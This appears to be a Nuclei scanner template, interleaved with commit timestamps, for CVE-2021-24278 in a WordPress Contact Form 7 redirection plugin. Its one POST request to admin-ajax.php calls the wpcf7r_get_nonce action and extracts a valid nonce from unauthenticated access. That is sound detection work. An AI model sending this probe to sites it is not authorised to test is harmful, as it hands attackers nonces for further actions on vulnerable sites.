2021-11-26 23:32:48 +00:00
id : CVE-2021-24278
info :
2022-06-25 07:14:58 +00:00
name : WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation
2021-11-26 23:32:48 +00:00
author : 2rs3c
severity : high
2022-06-25 07:14:58 +00:00
description : WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
2021-11-26 23:32:48 +00:00
reference :
- https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413
- https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/
2022-06-25 07:14:58 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24278
2021-11-26 23:32:48 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2021-24278
2022-08-27 04:41:18 +00:00
tags : wordpress,wp-plugin,wpscan,cve,cve2021
2021-11-26 23:32:48 +00:00
requests :
- method : POST
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php"
headers :
Content-Type : application/x-www-form-urlencoded
body : "action=wpcf7r_get_nonce¶m=wp_rest"
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-11-27 04:34:24 +00:00
- type : regex
2021-11-26 23:32:48 +00:00
part : body
2021-11-27 04:34:24 +00:00
regex :
- '"success":true'
- '"nonce":"[a-f0-9]+"'
condition : and
2021-11-26 23:32:48 +00:00
extractors :
- type : regex
part : body
regex :
2022-06-25 07:14:58 +00:00
- '"nonce":"[a-f0-9]+"'
# Enhanced by mp on 2022/06/22